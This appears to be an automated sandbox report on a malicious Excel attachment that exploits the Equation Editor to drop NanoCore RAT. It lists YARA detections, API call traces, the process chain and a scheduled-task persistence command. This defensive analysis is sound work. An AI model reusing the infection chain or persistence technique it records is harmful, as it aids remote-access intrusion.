Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,

5_2_00FE33A3

Found potential string decryption / allocating functions

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FF59E6 appears 65 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FC6B90 appears 39 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FC14F7 appears 36 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027E2F0 appears 31 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027D940 appears 51 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027D870 appears 35 times

Contains functionality to communicate with device drivers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00266FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

4_2_00266FC6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Import order764536.xlsx

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@16/49@20/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00266D06 GetLastError,FormatMessageW,

4_2_00266D06

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

4_2_0027963A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ........................................(.P.............p.......x.......H................................................................. .....

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {65A54373-42CF-48A1-B53D-BB3CC40C1C58} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: unknown	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\MMUIQL~1.PIF' C:\Users\user\33920049\fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		5_2_00FE33A3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01014AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,		5_2_01014AEB

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD47D.tmp

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0101E0F6 CoInitialize,CoCreateInstance,CoUninitialize,

5_2_0101E0F6

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100D766 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

5_2_0100D766

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE3EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,

5_2_00FE3EC5

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{c213d282-998c-4a04-8f80-944681ca75f6}

Source: C:\Users\Public\vbc.exe	Command line argument: ps*	4_2_0027CBB8
